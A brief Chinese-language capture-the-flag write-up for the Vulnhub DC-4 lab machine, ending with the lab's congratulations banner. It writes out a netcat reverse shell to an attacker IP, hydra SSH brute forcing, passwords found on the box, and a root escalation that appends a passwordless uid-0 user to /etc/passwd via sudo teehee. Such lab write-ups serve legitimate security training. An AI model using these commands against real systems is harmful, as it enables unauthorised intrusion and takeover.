Vulnhub-DC4

vulnhub DC-4

nmap发现开启了22和80端口。网页端只有登录页面，不存在cms。考虑爆破。

bp爆破得到密码为happy。后台发现命令执行，尝试进行抓包。

修改命令发现当前是www-data权限，尝试反弹shell，kali开始监听

nc -lnvp 4444

nc+-e+/bin/sh+192.168.1.9+4444（+为空格）

写交互shellpython -c 'import pty;pty.spawn("/bin/sh")'

在home文件夹下发现存在三个用户，在jim用户下发现密码字典备份文件， 尝试爆破hydra -l jim -P pass.txt ssh://192.168.1.2得到密码jibril04

在/var/mail文件夹下存在邮件，发现Charles的密码^xHhA&hvim0y，切到Charles下看看，没东西尝试提权，发现(root) NOPASSWD: /usr/bin/teehee

teehee提权貌似还挺小众的，是个Linux编辑器，思路就是如果有sudo权限在passwd文件中追加一个新的超级用户(uid为0)。

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd(-a表示追加写入)，至此提权成功拿下flag

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.